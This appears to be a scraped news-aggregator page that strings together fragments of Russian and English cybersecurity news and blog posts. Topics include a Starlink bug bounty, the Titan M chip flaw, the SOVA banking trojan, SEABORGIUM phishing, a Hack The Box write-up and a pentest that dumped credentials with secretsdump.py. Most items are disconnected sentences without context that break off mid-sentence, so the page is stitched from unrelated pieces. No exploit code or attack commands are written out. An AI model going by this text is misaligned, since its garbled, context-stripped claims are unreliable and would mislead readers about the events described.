Маск заплатит хакерам $25 тыс.

за взлом StarlinkAlexander AntipovSpaceX объявила о запуске программы, в рамках которой финансово вознаградит людей, которым удастся взломать спутниковую сеть Starlink.

Компания SpaceX объявила, что все желающие могут взломать ее спутниковую сеть Starlink и она готова заплатить им до $25 000 долларов за обнаружение конкретных уязвимостей.

Пресс-служба SpaceX заверила, что подвиг Воутерса не должен беспокоить пользователей Starlink: взлом напрямую не повлияет на спутники.

В компании также отметили, что их собственные инженеры и белые хакеры всегда пытаются разными способами взломать Starlink, чтобы улучшить сервис и сделать его более безопасным.

Критическая уязвимость в чипе Titan M от Google принесла исследователям $75 000Alexander AntipovTitan M – это система-на-чипе (SoC), разработанная для обеспечения повышенной защиты устройств Pixel.

Исследователи из Quarkslab опубликовали технические подробности критической уязвимости, обнаруженной ими в чипе Titan M от Google в начале этого года.

По словам исследователей Quarkslab, уязвимость можно использовать для выполнения произвольного кода на чипе Titan M. Чтобы эксплуатировать эту уязвимость, злоумышленнику не нужно взаимодействовать с пользователем.

Исследователи сообщили об уязвимости в Google в марте.

Google выпустила исправление CVE-2022-20233 в июне и первоначально назначила за н…

Ищем шпионское ПО на iPhoneAlexander AntipovБезопасность – одно из главных преимуществ iPhone от Apple перед конкурентами.

Однако атаки с использованием шпионского ПО Pegasus на iPhone журналистов и политиков по всему миру ясно дали понять, что даже защитные системы Apple не могут защитить от всего.

В этой статье мы расскажем вам, как обнаружить и удалить шпионское ПО со своего iPhone, а также разберем возможные методы защиты от программ по типу печально известной Pegasus.

Приложение запускается не на телефоне, а на компьютере с подключенным по USB iPhone.

MVT работает путем создания резервной копии iTunes вашего iPhone и последующего сканирования резервной копии на наличие шпионских програ…

Хакеры научились перемещать людей в пространствеAlexander AntipovУязвимости в RTLS-системе позволяют изменять местоположение объектов и отслеживать людей.

Его основная роль заключается в содействии безопасности путем определения геозон с использованием тегов отслеживания, якорей приема сигналов и центральной системы обработки.

Метки отслеживания связываются с якорем через UWB-сигналы, в то время как якоря используют Ethernet или Wi-Fi для передачи или получения данных от центрального компьютера.

Помимо манипулирования данными, злоумышленник может отслеживать положение людей, либо для преследования и разведки, либо для обнаружения ценного предмета.

Хакер, имеющий доступ к RTLS-системе, может…

Депутаты просят разблокировать Instagram* ради малого бизнесаAlexander AntipovДепутаты просят снять блокировку с социальной сети при устранении всех нарушений.

Партия «Новые люди» попросила Генпрокуратуру снова проверить соцсеть на предмет нарушений законодательства РФ и в случае их отсутствия отменить блокировку соцсети «в интересах российского малого бизнеса».

Ранее вице-спикер Госдумы Владислав Даванков заявил, что блокировка Instagram стала причиной массового использования «сомнительных сервисов VPN» и привела к падению доходов малого и среднего бизнеса.

Напомним, что в марте 2022 года Тверской суд Москвы признал компанию Meta экстремистской и запретил социальные сети Instagram* и Faceb…

Вирусы под видом игр Roblox и Brawl Stars воруют деньги со смартфонов детейAlexander AntipovПользователи скачивают дополнения для улучшения игры, но на самом деле эти приложения содержат вирусы.

Смартфоны детей атаковали вирусы, замаскированные под популярные игры Brawl Stars и Roblox.

Brawl Stars и Roblox являются трендовыми играми, поэтому мошенники умело использовали их для атаки на финансово неграмотные слои населения.

По данным «Лаборатория Касперского», количество атак под видом Brawl Stars увеличилось в 1,5 раза в первом полугодии 2022 года по сравнению с аналогичным периодом в 2021 году, а под Roblox — почти в четыре раза.

Злоумышленники маскируют вирусы и рекламное ПО под читы и мо…

Мошенники не отстают и активно используют VPN для проникновения в корпоративные сети и последующей кражи данных.

VPN, IPVanish VPN, KeepSolid VPN Unlimited, Lantern, PrivateTunnel, Speedify VPN, Tachyon VPN, X-VPN.

Поэтому речь о «тотальном запрете VPN» не идёт и действия РКН не противоречат заявлению министра Максута Шадаева.

Подключение через VPN в Windows 7У сервисов VPN много различных применений.

Ожидается, что в ближайшем будущем будут одновременно работать как VPN, так и отдельные элементы доступа по принципу Zero Trust.

в статье «Аутсорсинг ИБ в России: принципы выбора и доверия, MSSP или SECaaS»).

Где цифровизация, там и повышенная потребность в оперативном и безопасном масштабировании компании, новые риски в ИБ, дополнительные затраты на поиск и регулярное обучение специалистов, а также покупку и поддержку современных СЗИ.

Основной профиль таких компаний — уже комплексное обеспечение безопасности, более развитые и экспертные сервисы с охватом множества аспектов и доменов ИТ, помощь партнёра как в оценке рисков клиента, так и в разработке, поддержке и модернизации политики ИБ в перспективе.

При наличии доверия к партнёру (в рамках того, что заказчик готов отдать на аутсорсинг), а также в условиях уже расс…

Цунами DDoS-атак, накрывшее российские интернет-ресурсы весной и летом этого года, продемонстрировало всем актуальность этого вида киберугроз и развеяло последние сомнения относительно необходимости защиты от них.

Она зависит не только от технических характеристик ресурса, но и от того, как его владельцы или те, кто за него отвечает, взаимодействуют с поставщиками решений для защиты от DDoS-атак.

Один из наших клиентов подключил сервисы Anti-DDoS не только от крупного международного поставщика, но и от своего интернет-провайдера, однако эти сервисы не смогли обезопасить компанию от DDoS-атак минувшей весной.

Такая атака способна создать чрезмерную нагрузку не только на ваш ресурс, но и на в…

На этом фоне стало очевидным, что с кибератакой и её последствиями теперь может столкнуться абсолютно любая компания независимо от отрасли и масштаба.

Если же говорить о других отраслях, то здесь распределение более ровное: по 13 % на нефтедобывающую, электроэнергетическую отрасли и на ретейл, 11 % — на органы госвласти.

Цена и другие преградыПолученные результаты говорят о том, что и коммерческие, и государственные организации понимают, что в современных условиях потери от кибератак фактически становятся постоянной статьёй расходов.

Здесь хотелось бы обратить внимание на важность соотношения вложений непосредственно в саму защиту и в страховку — соблюдение так называемого Security Insuranc…

Целью исследования были оценка достигнутого уровня безопасности кода Open Source и выявление направлений, где уровень безопасности ещё недостаточно высок.

Выбор политики безопасности кода в компанииСледующий вопрос, который интересовал исследователей, касался особенностей внедрения политик безопасности в компаниях.

Контроль за уязвимостями в Open SourceПоявление уязвимостей в открытом коде является естественным процессом, считают исследователи.

Направления дальнейшего развития безопасности Open SourceВ заключении выделены направления, по которым исследователи рекомендуют наращивать внутри компаний активность по повышению безопасности открытого кода.

Но благодаря собранной статистике они обе…

Рынок систем управления киберрисками (Digital Risk Protection Services, DRPS) переживает ощутимый рост, как в российском сегменте, так и в международном.

Мы обсуждали эту тему, а также подробно говорили о возможностях DRPS с ключевыми игроками отечественного рынка в рамках проекта AM Live.

Российский рынок сервисов управления киберрисками (DRPS)Несмотря на то что отечественный рынок DRPS сформировался относительно недавно, на нём представлено несколько сильных решений.

Обзор отечественного рынка сервисов управления киберрисками (DRPS)BI.ZONE Brand ProtectionРешение BI.ZONE Brand Protection состоит из трёх модулей.

Обзор зарубежного рынка сервисов управления киберрисками (DRPS)BlueVoyant Sky…

Анонимайзер помогает завуалировать присутствие на уровне прикладных программ, но при работе в социальных сетях его применение невозможно.

Примеры анонимного присутствия в социальных сетяхПрисутствие в социальных сетях под настоящим именем часто может быть ограничено по тем или иным причинам.

Поэтому присутствие под другим, анонимным ником — это распространённое явление при общении в социальных сетях, оно позволяет сохранить конфиденциальность.

Не делитесь идентифицирующей информациейЧтобы сохранить свой аккаунт в секрете, не сообщайте и не указывайте в нём достоверную личную информацию: место работы или учёбы, год рождения, место проживания.

В неудачах нет ничего постыдного, но важно помнит…

Финансовый сектор неизменно входит в топ атакуемых отраслей, сталкиваясь как с массовыми, так и с целевыми кибератаками (APT).

Аналогичная ситуация сохранилась и в 2020 году.

Официальных данных о размерах потерь нет, поэтому обратимся к финансовым показателям банка (в чилийских песо).

Безусловно, в первую очередь внимание следует обратить именно на прибыль, которая с 2019 года сократилась более чем в два раза.

Примечательно, что общая денежная прибыль в первом полугодии 2022 года несколько уменьшилась, а по Новой Зеландии, напротив, возросла, в то время как в предыдущем периоде можно было наблюдать ровно противоположную картину.

На сайте ФСТЭК России появилась информация о прекращении действия сертификата для платформы «Дневник.ру», дающего возможность работы с персональными данными.

Персональные данные школьниковСооснователями платформы «Дневник.ру» стали предприниматели Гавриил Леви и Александр Зубков.

Интеграция платформы «Дневник.ру» с учётной системой «Госуслуг» появилась ещё во время пандемииПо данным сайта проекта, в 2021-2022 гг.

Происходящие изменения могут указывать на то, что персональные данные, которые до сих пор хранились на платформе «Дневник.ру», будут переведены в хранилище портала «Госуслуги».

Данные платформы «Дневник.ру» относятся к информации 5-го класса защищённостиВ то же время перенос данных…

Изменения касаются всех участников процесса — от операторов и сторонних обработчиков персональных данных (ПДн) до регуляторов и органов государственной власти.

Самые частые кейсы — при обработке данных сотрудников и при заключении с субъектом договора, который не предусматривает распространение и передачу персональных данных третьим лицам.

Наша практика показывает, что в большинстве случаев документация формируется в связи с субъектами или же всё отдельно — субъекты, цели, действия.

Они теперь тоже зависят от целей — категории персональных данных и субъектов, правовые основания обработки, перечень действий с ПДн в документ включать не нужно.

При этом необязательно интегрироваться технически…

Они представляют наименьший интерес для работодателя, и их ценность, как правило, зависит от каждого конкретного случая.

В итоге при внешнем аудите мы сталкиваемся как с халатностью («сам себе хозяин»), так и с неполнотой выполнения функций по причине перегрузки сотрудника.

Сюда входят и грамотная рассадка в кабинетах, и «уголки релаксации» с пуфами и фруктами в офисах, и корпоративы, и нормальное техническое обеспечение.

Основная причина неэффективной работы ИБ (и, как следствие, текучки кадров: хороший сам ушёл, а плохого уволили) — это некорректное распределение обязанностей.

Но если посчитать, сколько стоят неэффективно используемое время специалистов и их отток, а затем поиск новых, вы…

По данным пресс-релиза, продукты Zecurion SWG и Zecurion DLP были выбраны для решения задач контроля веб-трафика и защиты от утечек.

Внешний вид сводки в консоли по всем информационным потокам Zecurion SWGОсновными задачами Zecurion SWG являются:Выполнение функций прокси-сервера между инфраструктурой организации и сетью «Интернет».

Пример выявленных модулем IDS атакSWG от Zecurion блокирует передачу конфиденциальных данных при совместной работе с Zecurion DLP.

Основные возможности Zecurion SWGОсновная роль Zecurion SWG — быть прокси-сервером между внутренней сетью организации и интернетом.

В Zecurion SWG присутствуют предустановленные шаблоны отчётов: по временным отрезкам, по категориям ве…

Сегодня мы сфокусируем внимание на новой версии универсального инструмента для поиска уязвимостей в приложениях PT Application Inspector 4.0.

Архитектура PT Application InspectorPT Application Inspector состоит из трёх отдельно устанавливаемых модулей:PT Application Inspector Server — предоставляет другим модулям и веб-интерфейсу доступ к данным в PT Application Inspector 4.0, управляет этими данными.

PT Application Inspector Agent — проверяет исходный код на наличие уязвимостей и передаёт результаты сканирования модулю PT Application Inspector Enterprise Server.

Применение PT Application InspectorОсновные функции интерфейса PT Application InspectorРабота с продуктом начинается с авторизаци…

ИТ.МЭ.А4.ПЗ), профилю защиты МЭ (Б четвёртого класса защиты.

14 мая 2022 г.Следующая пакетная приостановка действия сертификатов ФСТЭК России, произошедшая 14 мая 2022 года, затронула ещё 14 российских продуктов.

Операционная система общего назначения «Стрелец» — сертификат № 4205 от 28.01.2020, соответствие требованиям к ОС, профилю защиты ОС (А второго класса защиты.

Сервис обеспечения оперативно-служебной деятельности НЦБ Интерпола МВД России — сертификат № 4535 от 06.05.2022, соответствие требованиям доверия (4), ТУ.

«Плановое» прекращение действия сертификатов ФСТЭК России в 2022 годуВ ходе исследования реестра был выявлен необычный характер отзывов сертификатов ФСТЭК России в 2022 год…

Год назад принцип федерального государственного контроля (надзора) за обработкой персональных данных кардинально изменился (вступило в силу Постановление Правительства РФ № 1046 «О федеральном государственном контроле (надзоре) за обработкой персональных данных» (от 29.06.2021)).

Теперь регулятор оценивает риски неправомерной обработки персональных данных и использует оценку для выявления тех операторов, к которым нужно прийти с проверкой.

Обновлённая методология отнесения оператора персональных данных ко группам рискаЧтобы рассчитать риски нарушений в области персональных данных и определить, какого оператора нужно проконтролировать, а какого нет, Правительство разработало специальную мето…

Абстрактные анонимные сети являются подмножеством класса теоретически доказуемой анонимностиСама маршрутизация является в таких системах двухслойной, и выражается по формуле lim|A|’→C <= |A| <= N, где N — количество узлов в сети, C — количество узлов участвующих в маршрутизации из всего множества сети.

Анонимные сети, с подобными характеристиками, будут именоваться абстрактными.

*Скрытые, тёмные, анонимные сети — есть сети, соединяющие и объединяющие маршрутизацию вместе с шифрованием (под шифрованием понимаются также этапы хеширования, подписания).

Одной из самых простых возможных реализаций абстрактной системы является использование очередей генерации пакетов в сети.

Простота построения ц…

ContainerLab.devКак пишут создатели, Containerlab предоставляет простой интерфейс командной строки для оркестрации и управления сетевыми лабами на основе контейнеров.

А вот в случае «не настоящего» вы подключитесь в «контейнер-обертку», а не в свою виртуальную машину с желаемым устройством.

И обратите внимание на IP адрес интерфейса управления ether1: 172.31.255.30/30, хотя SSH мы делали на 172.20.20.11.

Также через exec я сразу же на этапе развертывания лабы задаю параметры, специфичные для конкретного контейнера (IP адреса, маршруты…)Можно опубликовать порты.

Настройки «не настоящих контейнеров»Помните, docker exec пробрасывает не в виртуальную машину, а в «контейнер-обертку»?

Приехала я как-то на площадку для обучения нового инженера, нанятого заказчиком для работы с новой DLP-системой.

Читаю заключение, а там просто описание, что сотрудница скопировала, признала ошибку, обязуется больше так не делать, ибо воспитательная беседа с ней проведена.

Нет, не так.

· А все ли в порядке с правами доступа к источнику и с разграничениями этих прав?

И я даже не шовинист от мира аналитики, хотя и весьма субъективна.

Результаты прошлых лет можно найти здесь:О программеПосле нашего первоапрельского анонса (спасибо, что не посчитали его шуткой) желающие могли заполнить отборочные анкеты.

В программе Summ3r of h4ck в отделе исследований упор был сделан на личное общение наставников и участников в ходе работы над исследованиями.

В голове, а потом и в душе образовалась беспросветная тьма, грозившая поглотить нас изнутри.

Мне давно хотелось заниматься тестированием на уязвимости, я ходил на курсы, тренировался на различных площадках, искал, где можно найти практический опыт и… И, увидел новость о Summ3r 0f H4ck 2022.

PSPTool умеет это делать, но я получил в качестве теста прошивки ASRock, в которых $BHD некор…

В этой статье я расскажу о последовательности шагов, которая привела к получению привилегий администратора домена в компании, в которой «почти все безопасно».

Например, если какой-то сервис ходит к базе данных по имени, а не по IP-адресу, он уйдет не туда.

И в этот раз, используя proxychains4 и secretsdump.py, я получила учетные данные из реестра на хосте с именем SERVER1.

«Не обновлениями едиными»: важно не только обновлять ПО, но и использовать best practices в настройках используемого ПО.

Или можно запретить администраторам домена заходить на хосты, не являющиеся контроллерами домена (использовать типовую архитектуру).

showcert - маленькая CLI утилитка, альтернатива openssl для просмотра сертификатов.

Мне вообще сложно представить, как это можно автоматизировать через openssl и простые шелл скрипты.

Но с showcert стало еще проще:Простой приятный способ проверить, что все LetsEncrypt сертификаты еще свежи:# showcert :le -qw/etc/letsencrypt/live/example.com/fullchain.pem expires in 19 days/etc/letsencrypt/live/example.net/fullchain.pem expires in 19 days# echo $?

Проще через showcert получить часть команды и просто использовать ее (или даже использовать сам showcert в команде:certbot certonly --webroot /var/www/habr `showcert -o dnames habr.ru`Попробуйте, например, showcert -o dnames google.com .

Заключение…

Она позволяет создавать на фишинговом ресурсе поддельное окно браузера, на первый взгляд неотличимое от настоящего.

Жулики решили воспользоваться тем, что на платформе Steam аутентификация пользователя происходит во всплывающем окне, а не в новой вкладке.

Учитывая опасность для пользователей, мы решили детально проанализировать работу технологии Browser-in-the-Browser на примере фишинг-кита с ресурса, нацеленного на бренд Steam.

Рекламу фишинг-сайта можно увидеть как на экране, так и в описании видео.

В отличие от схем Phishing-as-a-Service, в которых фишинг-киты разрабатываются для продажи, фишинг-киты на Steam держат в большем секрете.

Другие – просто хотят работать без сбоев и инцидентов, хоть и не понимают, как это реализовать.

Мы уже писали о заказчиках, которые действительно хорошо разбираются в IT и точно понимают, чего они хотят от SOC.

В этом посте речь пойдет про тех, кто не понаслышке знает, что такое SIEM, возможно, работали в SOC и основная их цель – защита от киберугроз.

Будет полезна и помощь в реагировании на инцидент и проверке гипотезы компрометации на тех сегментах, которые не планируются к подключению к SOC и существуют автономно.

А при строительстве собственного SOC всегда надо помнить, что этот процесс занимает не месяц и не два.

На прошлой неделе команда безопасников компании Cisco, известная как Cisco Talos, опубликовала подробный отчет об атаке на инфраструктуру Cisco, произошедшую в мае этого года.

Доступ к корпоративной сети Cisco защищен многофакторной авторизацией, и здесь атакующие применили сразу два метода, чтобы заставить сотрудника авторизовать их.Первый метод — голосовой фишинг.

Сотруднику звонили на мобильный телефон, представлялись сотрудником службы поддержки и пытались обманом заставить подтвердить запрос на авторизацию.

По мнению Cisco Talos, доступ к корпоративной инфраструктуре получила группа, специализирующаяся на первоначальном взломе.

Выглядело это так:Дэн не стал отправлять им фото водительс…

Сегодня одна из наиболее безопасных практик - это как можно раньше переместить эти контрольные точки в цепи интеграции, чтобы быстрее обнаруживать любые аномалии, заслуживающие особого внимания.

Данный раздел содержит список хуков доступных бесплатно и простых в установке и использовании с помощью Pre-Commit.

Затем запустите команду pre-commit и получите результат!

В данной статье мы перечислили хуки Pre-Commit, полезные в повседневной работе для любого, кто администрирует один или более кластеров Kubernetes.

Больше информации про Pre-Commit можно найти по следующим ссылкам:Больше полезного из мира DevOps и DevSecOps - в нашем telegram-канале DevOps FM - присоединяйтесь, нас уже более тысяч…

Но пока разберём, что вообще такое NFT и что на этом примере непосвященному (или обманутому) человеку можно о них понять.

Продажа NFT первого твита Джека Дорси не означает и не могла означать продажу первого твита Джека Дорси.

Теперь приложим эту шкалу к NFT в чистом виде, на примере NFT первого твита Джека Дорси и получим: 0; 0.

Сложность абсолютно дутая, потому что в корне NFT предельно просты: NFT — это цифровая запись, указывающая на файл в интернете.

А значит, потребность в нём, особенно в мире, в котором возникает всё больше заборов и преград в виде санкций и блокировок всякого рода, неизбежно будет сохраняться и в дальнейшем.

ПартнерТелефонные номера примерно 1900 пользователей Signal были раскрыты в результате утечки данных, от которой ранее в этом месяце пострадала компания Twilio, занимающейся разработкой и предоставлением облачных PaaS-услуг.

Теперь разработчики мессенджера Signal опубликовали заявление, согласно которому атака на Twilio затронула и их пользователей.

Дело в том, что Signal использует Twilio для отправки верификационных SMS-кодов пользователям, регистрирующимся в приложении.

Однако телефонные номера примерно 1900 пользователей Signal могли попасть в руки злоумышленников, взломавших Twilio, и хакеры могли использовать эту возможность для перерегистрации на другом устройстве.

У злоумышленников …

ПартнерСпециалисты Microsoft Threat Intelligence Center (MSTIC) заявляют, что сорвали операцию, русскоязычной хак-группы SEABORGIUM, нацеленную на людей и организации в странах НАТО.

Группировка, которую Microsoft называет SEABORGIUM, известна исследователям как минимум с 2017 года.

«В целевых странах SEABORGIUM в первую очередь фокусирует свои операции на оборонных, разведывательных и консалтинговых компаниях, неправительственных и международных организациях, аналитических центрах и вузах, — пишут аналитики Microsoft.

Аналитики MSTIC пишут, что участники SEABORGIUM создают фейковые онлайн-личности с помощью электронной почты, социальных сетей и учетных записей LinkedIn.

Microsoft сообщает,…

ПартнерБанковский троян SOVA, предназначенный для Android, продолжает развиваться, говорят ИБ-эксперты из компании Cleafy, специализирующейся на безопасности мобильных устройств.

Авторы малвари улучшают свой код, а недавно добавили SOVA новую вымогательскую функцию, которая шифрует файлы на зараженных мобильных устройствах.

Аналитики Cleafy наблюдают за эволюцией SOVA с момента первого обнаружения этой угрозы в сентябре 2021 года и теперь сообщают, что в 2022 году развитие банкера резко ускорилось.

К примеру, последняя версия SOVA нацелена на 200 банковских приложений, приложений для обмена криптовалютами и цифровых кошельков, стремясь похитить из них конфиденциальные пользовательские данны…

В марте 2022 года специалист продемонстрировал технику, которая позволяет создавать фишинговые формы входа, используя для этого фейковые окна в браузере Chrome.

Этот URL-адрес позволяет убедиться, что для входа на сайт используется настоящий домен (например, google.com), что еще больше повышает доверие к процедуре.

В отличие от распространенных мошеннических схем, в которых наборы готовых инструментов для фишинговых страниц разрабатываются для продажи, решения Browser-in-the-browser для Steam держатся злоумышленниками в секрете.

Эксперты говорят, что в отличие от схем phishing-as-a-service, в которых фишинг-киты разрабатываются для продажи, фишинг-киты для Steam держат в большем секрете.

Ка…

ПартнерАналитики выявили проблемы в платежной системе, присутствующей на смартфонах Xiaomi с чипами MediaTek, которые обеспечивают Trusted Execution Environment (TEE, «доверенную среду исполнения»), отвечающую за подписание транзакций.

В числе последствий такой атаки могут быть как для отключение механизма мобильных платежей, так и для подделка транзакций (подписание транзакций из мобильного кошелька пользователя в кошелек злоумышленника).

Эксперты Check Point объясняют, что смартфоны Xiaomi с чипами MediaTek используют TEE-архитектуру Kinibi, которая имеет отдельный виртуальный анклав для хранения ключей, необходимых для подписания транзакций.

В итоге исследователи обошли патчи Xiaomi и Me…

В этом рай­тапе мы рас­кру­тим уяз­вимость локаль­ного вклю­чения фай­лов, что поможет нам при написа­нии экс­пло­ита на осно­ве ROP + mprotect.

Пре­пари­ровать будем машину Retired с пло­щад­ки Hack The Box .

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN.

На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

В резуль­тате ска­ниро­вания узна­ем, что нам дос­тупен в том чис­ле и файл / proc/ sched_debug , где и находим про­цесс activate_license и соот­ветс­тву­ющий ему иден­тифика­тор про­цес­са (PID) — 487.

На этот раз вредоносные пакеты оказались не совсем обычными: они не воруют учтенные данные или переменные среды, но атакуют серверы Counter-Strike.

Отмечается, что только 11 из 69 антивирусных движков на VirusTotal отмечают этот файл как вредоносный, потому как это относительно новая и незаметная малварь, написанная на C++.

Затем вредонос устанавливается и закрепляется в системе, прописываясь в автозагрузку, а также внедряет общесистемный root-сертификат с истекшим сроком действия.

Если подключиться не удается с трех попыток, вредонос пытается получить ответы на HTTP-запросы, отправленные на DGA-адреса.

Похоже, цель оператора этих пакетов заключалась в том, чтобы вывести из строя чей-то сер…

Исследователи напоминают, что Secure Boot является частью спецификации UEFI и призван защитить процесс загрузки ОС, чтобы в его рамках выполнялся только доверенный код, подписанный специальным сертификатом.

Специалисты пишут, что сразу три загрузчика UEFI, одобренные Microsoft, имели уязвимости, позволяющие обойти Secure Boot и выполнить неподписанный код:New Horizon Datasys Inc: CVE-2022-34302 (обход Secure Boot через кастомный установщик);CryptoPro Secure Disk: CVE-2022-34303 (обход Secure Boot посредством UEFI Shell);Eurosoft (UK) Ltd: CVE-2022-34301 (обход Secure Boot посредством UEFI Shell) .

«Это обновление устраняет уязвимость, добавляя сигнатуры известных уязвимых модулей UEFI в DBX…

ПартнерСМИ сообщили о взломе ShitExpress, веб-сервиса, который позволяет отправить друзьям и врагам по почте «подарок» с экскрементами животных (с персонализированным сообщением).

Троя, в свою очередь, даже создавал петицию на change.org, в которой просил мировых лидеров экстрадировать pompompurin в США.

На этот раз, посетив ShitExpress, pompompurin обнаружил, что сайт уязвим перед SQL-инъекциями.

Теперь он публикует некоторые особенно забавные послания клиентов ShitExpress на своем форуме и выложил там же украденную БД.

Пожалуйста, поймите, что это простой шуточный сайт.

Пар­кую у сель­по тяжело гру­жен­ный гигант­ским арбу­зом и бутыля­ми с водой Yamaha Gear и, не сле­зая со ску­тера, дос­таю из рюк­зака план­шет.

До­ма став­лю минерал­ку на стол и рас­смат­риваю эти­кет­ку: «Доб­рый док­тор № 4», нас­толь­ко жела­ющий быть «Ессенту­ками», что мес­тные так его обыч­но и называ­ют.

486-й я пока так и не завел, eMac тоже ждет сво­ей оче­реди, зато Mac mini 2006 года выпус­ка раду­ет меня ежед­невно.

Пом­нится, пять лет назад я ждал поез­да из одной тай­ской про­вин­ции в дру­гую и писал оче­ред­ную статью, вод­рузив ноут­бук на рюк­зак.

Пока же пожелай­те мне бла­гопо­луч­но вер­нуть­ся в цивили­зацию — к гигабит­ным каналам, широким монито­рам, служ­бам дос…

The North Korea-backed Lazarus Group has been observed targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets.

Slovak cybersecurity firm ESET linked it to a campaign dubbed "Operation In(ter)ception" that was first disclosed in June 2020 and involved using social engineering tactics to trick employees working in the aerospace and military sectors into opening decoy job offer documents.

"Malware is compiled for both Intel and Apple Silicon," the company said in a series of tweets.

"It drops three files: a decoy PDF document 'Coinbase_online_careers_2022_07.pdf', a bundle 'FinderFontsUpdater.app,' and a downloader 'safarifontagent.'"

Last month, it ca…

RubyGems, the official package manager for the Ruby programming language, has become the latest platform to mandate multi-factor authentication (MFA) for popular package maintainers, following the footsteps of NPM and PyPI.

To that end, owners of gems with over 180 million total downloads are mandated to turn on MFA effective August 15, 2022.

"Users in this category who do not have MFA enabled on the UI and API or UI and gem sign-in level will not be able to edit their profile on the web, perform privileged actions (i.e.

push and yank gems, or add and remove gem owners), or sign in on the command line until they configure MFA," RubyGems noted.

What's more, gem maintainers who cross 165 mill…

A group of researchers has revealed details of a new vulnerability affecting Intel CPUs that enables attackers to obtain encryption keys and other secret information from the processors.

Dubbed ÆPIC Leak, the weakness is the first-of-its-kind to architecturally disclose sensitive data in a manner that's akin to an "uninitialized memory read in the CPU itself."

"In contrast to transient execution attacks like Meltdown and Spectre, ÆPIC Leak is an architectural bug: the sensitive data gets directly disclosed without relying on any (noisy) side channel," the academics said.

"By protecting selected code and data from modification, developers can partition their application into hardened enclave…

UTM (Unified threat management) is thought to be an all-in-one solution for cybersecurity.

Most of all, UTMs are valued by SMEs - the all-in-one solution makes it simple to manage all their cybersecurity solutions and services.

Mail server & VPNThe mail server includes all the features needed to create a communication system for small and medium-sized companies.

Enterprises benefit a lot as well - it helps to reduce the costs associated with the implementation and subsequent operation of the mail system.

There is no need to purchase additional user and server licenses to use the mail server.

Cybersecurity researchers have elaborated a novel attack technique that weaponizes programmable logic controllers (PLCs) to gain an initial foothold in engineering workstations and subsequently invade the operational technology (OT) networks.

Dubbed "Evil PLC" attack by industrial security firm Claroty, the issue impacts engineering workstation software from Rockwell Automation, Schneider Electric, GE, B&R, Xinje, OVARRO, and Emerson.

Programmable logic controllers (PLCs) are a crucial component of industrial devices that control manufacturing processes in critical infrastructure sectors.

With the Evil PLC attack, the controller acts as a means to an end, permitting the threat actor to brea…

Microsoft on Monday revealed it took steps to disrupt phishing operations undertaken by a "highly persistent threat actor" whose objectives align closely with Russian state interests.

"Its campaigns involve persistent phishing and credential theft campaigns leading to intrusions and data theft."

Microsoft said it observed "only slight deviations in their social engineering approaches and in how they deliver the initial malicious URL to their targets."

"SEABORGIUM also abuses OneDrive to host PDF files that contain a link to the malicious URL," Microsoft said.

The last phase of attacks entails abusing the stolen credentials to access the victim's email accounts, taking advantage of the unaut…

Russian state-sponsored actors are continuing to strike Ukrainian entities with information-stealing malware as part of what's suspected to be an espionage operation.

Symantec, a division of Broadcom Software, attributed the malicious campaign to a threat actor tracked Shuckworm, also known as Actinium, Armageddon, Gamaredon, Primitive Bear, and Trident Ursa.

The threat actor, active since at least 2013, is known for explicitly singling out public and private entities in Ukraine.

"As the Russian invasion of Ukraine approaches the six-month mark, Shuckworm's long-time focus on the country appears to be continuing unabated," Symantec noted.

"While Shuckworm is not necessarily the most tactica…

Popular end-to-end encrypted messaging service Signal on Monday disclosed the cyberattack aimed at Twilio earlier this month may have exposed the phone numbers of roughly 1,900 users.

"For about 1,900 users, an attacker could have attempted to re-register their number to another device or learned that their number was registered to Signal," the company said.

Phishing and other types of social engineering rely on the human factor to be the weakest link in a breach.

But the latest incident also serves to highlight that third-party vendors pose as much a risk to companies.

The development further underscores the dangers of relying on phone numbers as unique identifiers, what with the technolog…

Even after years of warnings, changing password requirements, and multiple forms of authentication, password stealing remains a top attack method used by cyber criminals.

The latest report from the Ponemon Institute shares that 54% of security incidents were caused by credential theft, followed by ransomware and DDoS attacks.

Credential Theft and Critical AccessThe Verizon report also states that stolen credentials are most often used to target some form of a web application.

Add third-party remote access into the mix and you have a nasty combination of vulnerabilities.

If they don't, they'll be playing a different kind of catch-up: remediating all the damage a bad actor has already done.

The SOVA Android banking trojan is continuing to be actively developed with upgraded capabilities to target no less than 200 mobile applications, including banking apps and crypto exchanges and wallets, up from 90 apps when it started out.

In less than a year, the trojan has also acted as a foundation for another Android malware called MaliBot that's designed to target online banking and cryptocurrency wallet customers in Spain and Italy.

What's more, all the 13 Russian and Ukraine-based banking apps that were targeted by the malware have since been removed from the version.

The enhancement is also likely to make SOVA a formidable threat in the mobile threat landscape.

"The ransomware featu…

A U.K. water supplier suffered a disruption in its corporate IT systems Monday as a result of a cyber-attack but claims that its water supply was not affected.

Victim MisidentifiedThe Clop ransomware gang took responsibility for an attack on a U.K. water supplier on its dark web site, but said the victim was Thames Water and not South Staffordshire, according to a report posted on Bleepingcomputer.

Thames Water is the United Kingdom’s largest water supplier, serving 15 million customers in Greater London and other areas on the river that runs through the city.

Thames Water quickly took to its website to let all of its customers know that any media report claiming it suffered a cyber-attack …

WeChat Pay is a mobile payment and digital wallet service developed by a firm of the same name, which is based in China.

The service is used by over 300 million customers and allows Android users to make mobile payments and online transactions.

The core issue with Xiaomi phone was the mobile phones payment method and the Trusted Execution Environment (TEE) component of the phone.

Using a regular, unprivileged Android application, they were able to communicate with the trusted soter app via “SoterService,” an API for managing soter keys.

But the issue is even more significant for the Far East, where the market for mobile payments is already way ahead.

There was nothing typical this year at BSides LV, Black Hat USA and DEF CON – also known collectively as Hacker Summer Camp.

Belgian researcher Lennert Wouters revealed at Black Hat how he mounted a successful fault injection attack on a user terminal used to manage the satellite.

For fans of FUD, PC Magazine has a nice rundown of “The 14 Scariest Things We Saw at Black Hat 2022“.

Topics of DiscussionThe main Black Hat keynote was from Chris Krebs, former Cybersecurity and Infrastructure Security Agency (CISA), who shared his optimism when it comes to the US approach to information security.

ESET provided Black Hat attendees with an update on cyberattacks against Ukraine.

Zeppelin ransomware is back and employing new compromise and encryption tactics in its recent campaigns against various vertical industries—particularly healthcare—as well as critical infrastructure organizations, the feds are warning.

Tech companies also remain in the crosshairs of Zeppelin, with threat actors also using the RaaS in attacks against defense contractors, educational institutions and manufacturers, the agency said.

